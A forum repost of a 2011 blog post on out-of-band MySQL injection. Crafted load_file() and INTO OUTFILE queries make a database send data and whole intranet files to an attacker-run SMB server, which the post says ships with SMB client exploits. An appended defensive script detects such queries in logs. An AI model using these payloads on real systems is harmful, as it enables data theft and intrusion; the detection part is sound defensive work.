Paul4games Posted June 2, 2011

Over the past week I have been busy in the lab developing new attack vectors for MySQL injections by using the inter-protocol capability of the load_file() function. With load_file() you are able to load files from another machine over SMB; this happens through the underlying system's SMB client. A basic load_file() over SMB looks like this:

    select load_file("\\\\[ip | server_name]\\filename");

But this will also initialize an SMB connection:

    select 1 INTO OUTFILE "\\\\[ip | server_name]\\filename";

In fact, Fredrik wrote about this INTO OUTFILE problem as a way for malware to spread easily in internal networks.

After playing around I found ways of using concat() inside load_file(), which made MySQL injections look like this:

    select load_file(concat("\\\\[ip | server_name]\\", version()));

Which made everything so much easier; with this we can entirely abandon the stupid delay attacks with benchmark techniques and blind MySQL injections, and maybe even replace the current basic MySQL injections because of the ease of the queries, and you don't even have to look at how many columns are selected.

Now the other side of the injection: it uses the default SMB client, which means that if you are able to exploit this thing while it is connecting to you, you can do a lot more with the system.

I coded an SMB server for this in Python and inserted for now just 2 exploits (but more will come, I suppose, since I will be maintaining this program and making it stable over the next couple of weeks). The program can be found here.

For now I embedded the following exploits:

    MS10-020 stack overflow Windows 7/2008R2; trans2 response stack overflow
    Win7_remote_kernel_boom; NetBIOS length field crash

Here is a screenshot of MS10-020 in action to give you a basic idea of what I am talking about.

Okay, that was just a little sidestep, but this program is basically for grabbing the strings which are being defined in the MySQL injection. It will look something like this. You let the server connect to you over port 445 with its favorite SMB client, you catch what happens, and you won.

This trick is basically also possible with bigger files instead of just tiny strings by using INTO OUTFILE; in fact you can just dump entire files from the local network that way. Example:

    http://extranet/index.php?id=1 UNION ALL SELECT 1,2,load_file("\\\\intranet\\filename"),3,4 INTO OUTFILE "\\\\Your_SMB_server\\test";

This will proxy the file in the intranet over SMB to you.

I suppose this is not only working on MySQL, and with investigation I suppose you can go out of band in similar ways in other database-level programs; this is just to break the ice and make you realize how useful it is when you are capable of going out of band with SMB.

Blind MySQL injections are a lot better to exploit this way because you are capable of defining entire strings and not having to calculate every single character based on true/false responses or with delay tricks, and client-side SMB exploitation will have a much bigger future with the introduction of this.

I hope I provided enough information here for you to have as much fun with this as I did over the past few days, and keep me posted if you find other cool tricks possible with this feature.

Author: Jelmer de Hen
Source: Ack Ack « Go beyond the impossible!

I found the article very interesting, and the blog also has a lot of quality posts. Oh, and I almost forgot: Hen also created a toolkit for setting up an SMB server on your own PC: MySQL network exploitation toolkit 1.1
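A defender-side counterpart to the trick described in the post, added here and not part of the original article or of the toolkit: it scans MySQL general query log lines for load_file() / INTO OUTFILE / INTO DUMPFILE whose argument is a UNC path, which is exactly what forces the server's SMB client to connect out. The log layout, hosts, shares and every sample statement are constructed assumptions.

```python
import re

def _log_line(ts, tid, cmd, arg):
    """Build one line in the classic general-log layout: 'YYMMDD HH:MM:SS<TAB>thread_id Command<TAB>argument'."""
    return f"{ts}\t{tid:>5} {cmd}\t{arg}"

# Constructed sample log, not taken from the post; hosts, shares and paths are placeholders.
SAMPLE_LOG = "\n".join([
    _log_line("110602 10:14:01", 12, "Query", "SELECT id, name FROM users WHERE id = 1"),
    _log_line("110602 10:14:03", 12, "Query", r'SELECT load_file("\\\\10.0.0.99\\share\\x")'),
    _log_line("110602 10:14:05", 13, "Query", r'SELECT 1 INTO OUTFILE "\\\\10.0.0.99\\share\\out"'),
    _log_line("110602 10:14:07", 14, "Query", r'SELECT load_file(concat("\\\\10.0.0.99\\", version()))'),
    _log_line("110602 10:14:09", 15, "Query", "SELECT load_file('/etc/hostname')"),
    _log_line("110602 10:14:11", 16, "Query", "SELECT * FROM t INTO OUTFILE '/tmp/t.csv'"),
    _log_line("110602 10:14:13", 17, "Query", "INSERT INTO links VALUES ('http://example.test/a')"),
    _log_line("110602 10:14:15", 18, "Query",
              r'SELECT 1,2,load_file("\\\\intranet\\filename"),3,4 INTO OUTFILE "\\\\Your_SMB_server\\test"'),
])

LOG_LINE = re.compile(r"^(?P<ts>\d{6} [\d:]{8})\t\s*(?P<tid>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")
# The file-touching constructs the post uses to make the server open an SMB connection.
FILE_OP = re.compile(r"load_file\s*\(|into\s+(?:outfile|dumpfile)\b", re.IGNORECASE)
# In SQL source a UNC path is written with escaped backslashes ("\\\\host\\file"), so four
# literal backslashes are the tell-tale; "//host/" is the forward-slash spelling of the same.
UNC_HINT = re.compile(r"\\{4}|//[^/\s'\"]+/")

def classify_statement(sql):
    """One finding per file operation in the statement, tagged 'unc' (network path) or 'local'."""
    findings = []
    ops = list(FILE_OP.finditer(sql))
    for i, m in enumerate(ops):
        # Only inspect the argument text between this keyword and the next file operation.
        end = ops[i + 1].start() if i + 1 < len(ops) else len(sql)
        arg = sql[m.end():end]
        op = re.sub(r"\s+", " ", m.group(0).rstrip("(")).strip().lower()
        findings.append({"op": op, "path": "unc" if UNC_HINT.search(arg) else "local"})
    return findings

def scan_general_log(text):
    """Return one alert per file operation aimed at a UNC path, keeping the thread id for triage."""
    alerts = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m or m.group("cmd") != "Query":
            continue
        for f in classify_statement(m.group("arg")):
            if f["path"] == "unc":
                alerts.append({"ts": m.group("ts"), "thread": m.group("tid"), "op": f["op"], "sql": m.group("arg")})
    return alerts
```

Run scan_general_log(SAMPLE_LOG) to see the five hits; on a real deployment the lasting fix is secure_file_priv pointing at a local directory and the FILE privilege withheld from application accounts, which removes the server's ability to reach a UNC path at all.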